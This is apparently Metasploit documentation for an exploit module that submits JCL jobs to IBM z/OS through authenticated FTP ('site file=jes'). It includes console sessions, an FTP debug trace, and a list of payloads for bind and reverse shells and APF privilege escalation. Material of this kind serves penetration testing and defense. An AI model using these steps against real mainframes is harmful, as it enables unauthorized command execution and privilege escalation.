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GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/mainframe/ftp/
Views: 1904

z/OS JCL authorized FTP-base command execution - hints & tips

In order to use this exploit, you must have valid credentials on the target z/OS system. The credentials must have access to upload files via FTP. If in doubt, use the check function of the exploit.

Vulnerable Application

This exploit was tested on the ftp daemons for z/OS version 1.13 / 2.1


If the exploit works, any JCL the user has rights to submit can be submitted.

See cmd type payloads under mainframe with jcl in the payload name, e.g.:

msf exploit(ftp_jcl_creds) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- cmd/mainframe/apf_privesc_jcl normal JCL to escalate privileges via APF LIB cmd/mainframe/bind_shell_jcl normal Z/OS (MVS) Command Shell, Bind TCP cmd/mainframe/generic_jcl normal Generic JCL Test for Mainframe Exploits cmd/mainframe/reverse_shell_jcl normal Z/OS (MVS) Command Shell, Reverse TCP

Verification Steps

A successful check of the exploit will look like this:

msf exploit(ftp_jcl_creds) > set FTPUSER ftptest FTPUSER => ftptest msf exploit(ftp_jcl_creds) > set FTPPASS password FTPPASS => password msf exploit(ftp_jcl_creds) > set RHOST RHOST => msf exploit(ftp_jcl_creds) > info Name: FTP JCL Execution Module: exploit/mainframe/ftp/ftp_jcl_creds Platform: Mainframe Privileged: No License: Metasploit Framework License (BSD) Rank: Normal Disclosed: 2013-05-12 Available targets: Id Name -- ---- 0 auto Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- FTPPASS password no The password for the specified username FTPUSER ftptest no The username to authenticate as RHOST yes The target address RPORT 21 yes The target port SLEEP 5 no Time to wait before checking if job has completed. Payload information: Description: Submit JCL to z/OS via FTP and SITE FILE=JES. This exploit requires valid credentials on the target system msf exploit(ftp_jcl_creds) > check [+] - Successfully connected to FTP server. [*] - Found IBM z/OS Banner and JES commands accepted [+] The target is vulnerable. msf exploit(ftp_jcl_creds) >


If the exploit or check is not working, turn on the VERBOSE and FTPDEBUG settings of the exploit and run. The output should look similar to the below, on a vulnerable system.

msf exploit(ftp_jcl_creds) > set FTPDEBUG true FTPDEBUG => true msf exploit(ftp_jcl_creds) > set VERBOSE true VERBOSE => true msf exploit(ftp_jcl_creds) > check [*] - Connecting to FTP server [*] - FTP recv: "220-FTPD1 IBM FTP CS V2R1 at ZOS.EXAMPLE.COM, 16:52:31 on 2016-04-27.\r\n220 Connection will close if idle for more than 5 minutes.\r\n" [*] - Connected to target FTP server. [*] - Authenticating as ftptest with password password... [*] - FTP send: "USER ftptest\r\n" [*] - FTP recv: "331 Send password please.\r\n" [*] - Sending password... [*] - FTP send: "PASS password\r\n" [*] - FTP recv: "230 FTPTEST is logged on. Working directory is \"FTPTEST.\".\r\n" [+] - Successfully connected to FTP server. [*] - FTP send: "site file=jes\r\n" [*] - FTP recv: "200 SITE command was accepted\r\n" [*] - Found IBM z/OS Banner and JES commands accepted [+] The target is vulnerable. msf exploit(ftp_jcl_creds) >


The job run will leave a joblog for the credentials used.